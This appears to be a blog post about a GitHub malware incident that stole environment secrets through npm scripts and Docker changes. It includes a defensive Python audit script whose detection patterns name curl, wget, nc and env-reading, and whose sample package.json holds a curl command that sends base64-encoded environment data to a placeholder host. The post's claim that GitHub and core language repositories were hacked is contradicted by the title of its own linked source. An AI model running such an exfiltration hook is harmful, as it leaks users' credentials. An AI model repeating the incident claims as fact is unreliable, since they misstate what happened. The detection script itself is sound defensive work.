GitHub being hacked? To most that doesn't sound too unreasonable, as major tech companies and minor ones alike have been hacked before. However, this doesn't mean the likelihood of GitHub being hacked is high. Why is that? GitHub is the main open code repository for everyone in the IT industry, regardless of sub-sector. Whether someone does embedded systems, Web3 development, Web2 development, data science or anything else, most would use GitHub to store their code. It is because of this that GitHub's security has always been so extremely high. Not just because they wanted to be trusted by their users, but also because the code in their users' GitHub repositories is filled with crypto private keys, API private keys, financial credentials and even proprietary software from multiple companies across the IT industry globally. It is for this reason that GitHub has always been strict with its security and user accessibility, and that is why this hack, although not completely surprising, is very startling and worrying.
What type of hack attack was it? It is a malware attack. So not the traditional DDoS or forced penetration attack one would have expected, but potentially more lethal. The hacker or hackers uploaded a widespread piece of malware to different repositories across the platform.
What does the malware do? It copies any financial information, authentication information and private crypto keys, essentially the ENV of the script. Then, once accepted into the repository and run locally on the affected computers, it copies that information and sends it to the attacker. So not a hack in the traditional sense, but definitely a hack, as information was still extracted through a non-consensual data breach.
What is the breadth of the hack attack? This particular attempted hack has reached no more and no less than 35,000 GitHub repositories. It has infiltrated repositories such as the Python repo, Golang repo, Docker repo and Bash repo. Some of the repositories affected were even archived and unused. Some were even seen with the malware inside of them from as far back as 2015. This indicates that the hack was a well-documented and well-planned one.
How does it infiltrate the GitHub repositories? It is added to the GitHub repositories through a commit, and within the commit through npm scripts or different Docker image classifications. So you would mainly only be vulnerable if your project utilized JavaScript in some way, or Docker. Then, if the commit is accepted and is cloned and used in the main repository, the users who cloned it will be affected.
As I type about this incident, all parties involved in the cleanup, the repository owners and GitHub, are already in the process of damage control and making sure this doesn't happen again. We can only speculate and wonder as to what different security techniques and defenses GitHub will use to protect itself from future attacks. As such, we must focus on ourselves as individuals or groups. What can we do in our own capacity to stop future data theft like this?
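One concrete thing an individual can do before accepting or installing a commit is audit the npm lifecycle scripts it touches, since those run automatically on every machine that installs the package. The script below is an added example, not code from the original post or from any affected project; the two package.json documents and the `example.invalid` host it contains are constructed for the demonstration.

```python
import json
import re

# npm runs these hooks on its own during `npm install`, so a commit that
# adds a shell command here executes on every machine that installs the package.
AUTO_RUN_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Patterns that suggest a hook is reading secrets or shipping data off the host.
SUSPICIOUS = {
    "reads-env": re.compile(r"process\.env|\benv\b|printenv|\.env\b"),
    "network":   re.compile(r"\bcurl\b|\bwget\b|https?://|\bnc\b|fetch\(|\.request\("),
    "encoding":  re.compile(r"base64|\beval\b|Buffer\.from|\batob\b"),
}

def audit_package_json(text):
    """Return one finding per auto-run lifecycle script that matches a pattern."""
    scripts = json.loads(text).get("scripts", {})
    findings = []
    for hook in AUTO_RUN_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        tags = [name for name, rx in SUSPICIOUS.items() if rx.search(cmd)]
        if tags:
            findings.append({"hook": hook, "command": cmd, "tags": tags})
    return findings

# Constructed sample: a normal native-module build step, nothing to flag.
CLEAN_PACKAGE_JSON = json.dumps({
    "name": "demo-clean", "version": "1.0.0",
    "scripts": {"postinstall": "node-gyp rebuild", "test": "jest"},
})

# Constructed sample: a postinstall hook that reads the environment, encodes it
# and posts it to a placeholder host. This is the shape of change to reject in review.
SUSPECT_PACKAGE_JSON = json.dumps({
    "name": "demo-suspect", "version": "1.0.0",
    "scripts": {"postinstall": "curl -s https://example.invalid/c?d=$(env | base64) || true"},
})

if __name__ == "__main__":
    for label, doc in (("clean", CLEAN_PACKAGE_JSON), ("suspect", SUSPECT_PACKAGE_JSON)):
        print(label, audit_package_json(doc))
```

The Docker-image side of the same incident needs an equivalent review of any added `RUN` lines and base-image changes in the Dockerfile, which this check does not cover.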
Overall, let this be a lesson to us all. The attacks that nefarious organizations or people may carry out are not just rudimentary but also advanced, indiscriminate and planned over the long term. As developers we need to be more aware of the vulnerabilities of our code, repositories, computers and even ourselves, and that if someone wants information they can find very different ways to get it. Even if the internet should be safe, that doesn't mean it is. It is up to everyone to do their part to keep their own data safe and, if you can, to find ways to help others keep their data safe.
For further reading on the situation, see: https://www.bleepingcomputer.com/news/security/35-000-code-repos-not-hacked-but-clones-flood-github-to-serve-malware/